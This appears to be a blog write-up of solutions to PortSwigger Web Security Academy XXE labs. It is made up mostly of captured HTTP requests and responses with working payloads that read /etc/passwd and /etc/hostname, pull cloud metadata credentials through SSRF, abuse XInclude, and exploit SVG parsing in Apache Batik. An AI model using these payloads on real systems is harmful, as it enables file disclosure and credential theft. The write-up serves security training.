- Published on
XXE Labs Overview
XXE Labs
Solution for some Labs
For this lab we just had to add DOCTYPE element in the XML request
POST /product/stock HTTP/1.1
Host: ac471fa01e24fa45c1da07e500c70073.web-security-academy.net
Cookie: session=dHC3Eadta5BLBVZn5ncUNmfdh4NS6XKq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac471fa01e24fa45c1da07e500c70073.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac471fa01e24fa45c1da07e500c70073.web-security-academy.net
Content-Length: 179
Te: trailers
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Request is
POST /product/stock HTTP/1.1
Host: ac491fc11faf9821c096360700b50035.web-security-academy.net
Cookie: session=MVs1UcQIMuZIaxaMlk8T8VBGwYlvIgDR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac491fc11faf9821c096360700b50035.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac491fc11faf9821c096360700b50035.web-security-academy.net
Content-Length: 237
Te: trailers
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<stockCheck><productId>
&xxe;</productId><storeId>&xxe;</storeId></stockCheck>
Response is
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 553
"Invalid product ID:
{
"Code" : "Success",
"LastUpdated" : "2021-12-02T03:56:59.596734488Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "lmepP7PiMtM3VPnJdRJQ",
"SecretAccessKey" : "DmMcGZmJPwlQAVUMkyxpjCLctv15xEq8zKgk5UpE",
"Token" : "ZdIOYPHVyDE7k8hVfzDv9oGRvJ4Slkt5grwuEKPih1Ot3ZPYrV1rwj5lSQBVd1dZOqVSed2pj3XCB3msq5l0kSqaGOEjqyue57kCL4TRDZiRcdfYzwml7WN5k3aP3LlqOQh9Z2uaFQGwRLE3AmNTgsg19X4Ko6uG2bZgjRNopyTZ0BiTkj3fMTbMMXcJsJnkgvkMBuy23Hm8fNislMYQ4R7tM8sp3ta37bP1LNWaY93QFAloNN0VxlP9Y8aAm2W9",
"Expiration" : "2027-12-01T03:56:59.596734488Z"
}"
How did we know which parameter to pollute ?
When I added <xml> in place of 1 ( for productId=1 in param) the response is
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 118
"XML parser exited with non-zero code 1: The element type xml must be terminated by the matching end-tag </xml>.
"
Solution
Request
POST /product/stock HTTP/1.1
Host: ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net
Cookie: session=lx5TIipReFwKd43FLC8Q0xg8clcQtmG1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net
Content-Length: 128
Te: trailers
Connection: close
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
Response
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 1229
"Invalid product ID:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
"
As here it was mentioned to us that the backend uses Apache Batik Library for image processing hence I searched for vulnerabilities surrounding Batik library. I was able to find a report on the vulnerability along with payload used here
svg file payload that we created is :
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="1000px" height="1000px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="100px" x="100" y="400">&xxe;</text></svg>
Request is
POST /post/comment HTTP/1.1
Host: ac571f961eb53715c0de5e2b00460064.web-security-academy.net
Cookie: session=Yuf0K6BH4jteoqJeKkeYM6dQDPfDmkij
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac571f961eb53715c0de5e2b00460064.web-security-academy.net/post?postId=5
Content-Type: multipart/form-data; boundary=---------------------------4953441272046910820874195104
Content-Length: 1271
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="csrf"
zhbpSJRCY0UdwysJFDOPr0yBRIVw5QSB
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="postId"
5
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="comment"
test
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="name"
test
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="avatar"; filename="test_image.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="1000px" height="1000px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="100px" x="100" y="400">&xxe;</text></svg>
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="email"
test@test.com
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="website"
http://www.test.com
-----------------------------4953441272046910820874195104--
The resulting image which can be downloaded has the desired hostname.
BLIND XXE REMAINS
Theory and lab at https://portswigger.net/web-security/xxe/blind . These labs require burp collaborator as they all have out of band interaction involved. Need to buy burp pro 😔